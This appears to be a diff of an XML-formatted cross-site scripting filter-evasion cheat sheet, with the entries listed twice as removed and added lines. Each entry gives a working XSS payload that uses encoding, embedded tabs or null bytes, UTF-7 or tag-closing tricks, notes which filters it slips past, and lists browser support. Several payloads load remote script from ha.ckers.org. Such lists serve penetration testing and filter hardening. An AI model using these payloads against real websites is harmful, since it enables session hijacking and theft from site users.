- <desc>All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Case Insensitive</name>
- <code><IMG SRC=JaVaScRiPt:alert('XSS')></code>
- <desc>Case insensitive XSS attack vector.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>HTML Entities</name>
- <code><IMG SRC=javascript:alert(&quot;XSS&quot;)></code>
- <desc>HTML entities (the semicolons are required for this to work).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Grave Accents</name>
- <code><IMG SRC=`javascript:alert("RSnake says, 'XSS'")`></code>
- <desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Image w/CharCode</name>
- <code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code>
- <desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>UTF-8 Unicode Encoding</name>
- <code><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;></code>
- <desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Long UTF-8 Unicode w/out Semicolons</name>
- <code><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></code>
- <desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV w/Unicode</name>
- <code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code>
- <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Hex Encoding w/out Semicolons</name>
- <code><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></code>
- <desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>UTF-7 Encoding</name>
- <code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code>
- <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Escaping JavaScript escapes</name>
- <code>\";alert('XSS');//</code>
- <desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>End title tag</name>
- <code></TITLE><SCRIPT>alert("XSS");</SCRIPT></code>
- <desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/broken up JavaScript</name>
- <code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></code>
- <desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Tab</name>
- <code><IMG SRC="jav	ascript:alert('XSS');"></code>
- <desc>Embedded tab to break up the cross site scripting attack.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Encoded Tab</name>
- <code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code>
- <desc>Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Newline</name>
- <code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code>
- <desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Carriage Return</name>
- <code><IMG SRC="jav&#x0D;ascript:alert('XSS');"></code>
- <desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Multiline w/Carriage Returns</name>
- <code><IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
</code>
- <desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Null Chars 1</name>
- <code>perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out</code>
- <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Null Chars 2</name>
- <code>perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out</code>
- <desc>Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Spaces/Meta Chars</name>
- <code><IMG SRC=" &#14; javascript:alert('XSS');"></code>
- <desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal).</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Non-Alpha/Non-Digit</name>
- <code><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
- <desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s"</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Non-Alpha/Non-Digit Part 2</name>
- <code><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></code>
- <desc>Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>No Closing Script Tag</name>
- <code><SCRIPT SRC=http://ha.ckers.org/xss.js</code>
- <desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Protocol resolution in script tags</name>
- <code><SCRIPT SRC=//ha.ckers.org/.j></code>
- <desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Half-Open HTML/JavaScript</name>
- <code><IMG SRC="javascript:alert('XSS')"</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+\u003C</code>
+ <desc>All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Case Insensitive</name>
+ <code><IMG SRC=JaVaScRiPt:alert('XSS')></code>
+ <desc>Case insensitive XSS attack vector.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>HTML Entities</name>
+ <code><IMG SRC=javascript:alert(&quot;XSS&quot;)></code>
+ <desc>HTML entities (the semicolons are required for this to work).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Grave Accents</name>
+ <code><IMG SRC=`javascript:alert("RSnake says, 'XSS'")`></code>
+ <desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Image w/CharCode</name>
+ <code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code>
+ <desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>UTF-8 Unicode Encoding</name>
+ <code><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;></code>
+ <desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Long UTF-8 Unicode w/out Semicolons</name>
+ <code><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></code>
+ <desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV w/Unicode</name>
+ <code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code>
+ <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Hex Encoding w/out Semicolons</name>
+ <code><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></code>
+ <desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>UTF-7 Encoding</name>
+ <code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code>
+ <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Escaping JavaScript escapes</name>
+ <code>\";alert('XSS');//</code>
+ <desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>End title tag</name>
+ <code></TITLE><SCRIPT>alert("XSS");</SCRIPT></code>
+ <desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/broken up JavaScript</name>
+ <code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></code>
+ <desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc>
+ <label>Character Encoding Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Tab</name>
+ <code><IMG SRC="jav	ascript:alert('XSS');"></code>
+ <desc>Embedded tab to break up the cross site scripting attack.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Encoded Tab</name>
+ <code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code>
+ <desc>Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Newline</name>
+ <code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code>
+ <desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Embedded Carriage Return</name>
+ <code><IMG SRC="jav&#x0D;ascript:alert('XSS');"></code>
+ <desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Multiline w/Carriage Returns</name>
+ <code><IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
</code>
+ <desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Null Chars 1</name>
+ <code>perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out</code>
+ <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Null Chars 2</name>
+ <code>perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out</code>
+ <desc>Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Spaces/Meta Chars</name>
+ <code><IMG SRC=" &#14; javascript:alert('XSS');"></code>
+ <desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal).</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Non-Alpha/Non-Digit</name>
+ <code><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
+ <desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s"</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Non-Alpha/Non-Digit Part 2</name>
+ <code><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></code>
+ <desc>Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>No Closing Script Tag</name>
+ <code><SCRIPT SRC=http://ha.ckers.org/xss.js</code>
+ <desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Protocol resolution in script tags</name>
+ <code><SCRIPT SRC=//ha.ckers.org/.j></code>
